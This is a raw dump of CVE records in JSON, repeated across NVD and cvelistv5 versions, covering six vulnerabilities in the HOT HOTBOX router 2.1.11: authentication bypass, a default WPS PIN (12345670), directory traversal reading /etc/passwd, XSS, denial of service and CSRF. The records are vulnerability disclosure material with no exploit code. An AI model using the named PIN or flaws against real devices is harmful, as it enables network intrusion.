"cveId": "CVE-2013-5039",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.307Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5038 (GCVE-0-2013-5038)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.212Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5038",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5038",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.212Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5037 (GCVE-0-2013-5037)
Vulnerability from nvd – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.247Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5037",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5037",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5219 (GCVE-0-2013-5219)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.338Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5219",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5219",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.338Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5218 (GCVE-0-2013-5218)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.356Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5218",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5218",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.356Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5220 (GCVE-0-2013-5220)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 17:06- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:06:52.402Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5220",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5220",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-15T00:00:00.000Z",
"dateUpdated": "2024-08-06T17:06:52.402Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5039 (GCVE-0-2013-5039)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.307Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5039",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSecurity on the HOT HOTBOX router with software 2.1.11 allows remote attackers to hijack the authentication of administrators for requests that change the WiFi Security field to Deactivated via the WifiSecurity parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5039",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.307Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5038 (GCVE-0-2013-5038)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.212Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5038",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5038",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.212Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-5037 (GCVE-0-2013-5037)
Vulnerability from cvelistv5 – Published: 2013-12-30 02:00 – Updated: 2024-08-06 16:59- n/a
| URL | Tags |
|---|---|
| http://www.youtube.com/watch?v=CPlT09ZIj48 | x_refsource_MISC |
| http://packetstormsecurity.com/files/123901/HOTBO… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:59:41.247Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-09-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-30T01:57:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-5037",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.youtube.com/watch?v=CPlT09ZIj48",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=CPlT09ZIj48"
},
{
"name": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/123901/HOTBOX-2.1.11-CSRF-Traversal-Denial-Of-Service.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-5037",
"datePublished": "2013-12-30T02:00:00.000Z",
"dateReserved": "2013-08-06T00:00:00.000Z",
"dateUpdated": "2024-08-06T16:59:41.247Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}